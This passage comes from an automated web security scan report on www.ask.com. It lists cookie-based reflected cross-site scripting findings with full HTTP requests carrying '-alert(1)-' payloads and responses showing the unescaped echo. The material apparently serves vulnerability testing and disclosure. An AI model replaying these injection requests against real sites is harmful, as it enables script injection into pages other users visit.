<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F357747'-alert(1)-'ca35c7381e5;u4=014DDB4118C033B329ACD8C41BD460F3;u3=0;u2=;ord=-1144948711?" width="1" height="1" frameborder="0">
...[SNIP]...

3.553. http://www.ask.com/answers/000/Notification [wz_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/answers/000/Notification

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f663'-alert(1)-'6dde55b3906 was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /answers/000/Notification HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F37f663'-alert(1)-'6dde55b3906; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:47:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:47:11 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ3OjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:11 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:11 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 34571

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=014DDB4118C033B329ACD8C41BD460F37f663'-alert(1)-'6dde55b3906;u3=0;u2=;ord=-376996399?" width="1" height="1" frameborder="0">
...[SNIP]...

3.554. http://www.ask.com/answers/000/Notification [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/answers/000/Notification

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38742'-alert(1)-'ce01e4638f7 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /answers/000/Notification HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F338742'-alert(1)-'ce01e4638f7; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:47:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:47:12 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ3OjEyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:12 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:12 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 34570

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F338742'-alert(1)-'ce01e4638f7;u4=014DDB4118C033B329ACD8C41BD460F3;u3=0;u2=;ord=-85737917?" width="1" height="1" frameborder="0">
...[SNIP]...

3.555. http://www.ask.com/blogsearch [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/blogsearch

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8427e'-alert(1)-'83fed6c68a0 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /blogsearch?qsrc=0&o=0&l=dir&q= HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F38427e'-alert(1)-'83fed6c68a0; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:47:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:47:57 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ3OjU3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:57 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:57 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 93735

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0A4EDD4111C033B329ACD8C41BD460F38427e'-alert(1)-'83fed6c68a0;u4=;u3=;u2=0;ord=-249082308?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs
...[SNIP]...

3.556. http://www.ask.com/homepage [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/homepage

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6cd5'-alert(1)-'1360ad7978f was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /homepage HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3d6cd5'-alert(1)-'1360ad7978f; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:46:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:46:04 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjA0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:04 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:04 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 93735

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0A4EDD4111C033B329ACD8C41BD460F3d6cd5'-alert(1)-'1360ad7978f;u4=;u3=;u2=0;ord=-679133607?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs
...[SNIP]...

3.557. http://www.ask.com/jsignin [wz_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/jsignin

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db982'-alert(1)-'2285582d443 was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /jsignin HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3db982'-alert(1)-'2285582d443; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:44:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35004

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=014DDB4118C033B329ACD8C41BD460F3db982'-alert(1)-'2285582d443;u3=16594;u2=;ord=-767568984?" width="1" height="1" frameborder="0">
...[SNIP]...

3.558. http://www.ask.com/jsignin [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/jsignin

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e170a'-alert(1)-'2de3f3a6cc3 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /jsignin HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3e170a'-alert(1)-'2de3f3a6cc3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:44:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35005

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3e170a'-alert(1)-'2de3f3a6cc3;u4=014DDB4118C033B329ACD8C41BD460F3;u3=16594;u2=;ord=-1091868318?" width="1" height="1" frameborder="0">
...[SNIP]...

3.559. http://www.ask.com/more [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/more

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18b30'-alert(1)-'8eaac599238 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /more HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F318b30'-alert(1)-'8eaac599238; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:47:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:47:12 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ3OjEyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:12 GMT; Path=/
Set-Cookie: jss=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:12 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:47:12 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 93736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0A4EDD4111C033B329ACD8C41BD460F318b30'-alert(1)-'8eaac599238;u4=;u3=;u2=0;ord=-751136927?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs
...[SNIP]...

3.560. http://www.ask.com/pictures [user cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictures

Issue detail

The value of the user cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfb62'-alert(1)-'5f081d89f5f was submitted in the user cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /pictures HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dircfb62'-alert(1)-'5f081d89f5f;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:46:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:46:01 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjAxLVVUQw%3D%3D&po=0&pp=dircfb62%27-alert%281%29-%275f081d89f5f; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:01 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:01 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 57326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

<tit
...[SNIP]...

var _matchUrl = '/afc-match?q=&page=1&ac=24&qid=B3B3624DFFAF7BCB1486B2791219065B&qsrc=121&dm=all&qrt=2&lid=5490&o=0&l=dircfb62'-alert(1)-'5f081d89f5f';

_matchUrl+= "&userip=173.193.214.243";

_matchUrl+="&losid=a&locid=ph&lodid=us";

...[SNIP]...

3.561. http://www.ask.com/pictures [wz_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictures

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99e5c'-alert(1)-'dada02f5bb1 was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /pictures?qsrc=167&o=0&l=dir&q=regulator+boat&v=14 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
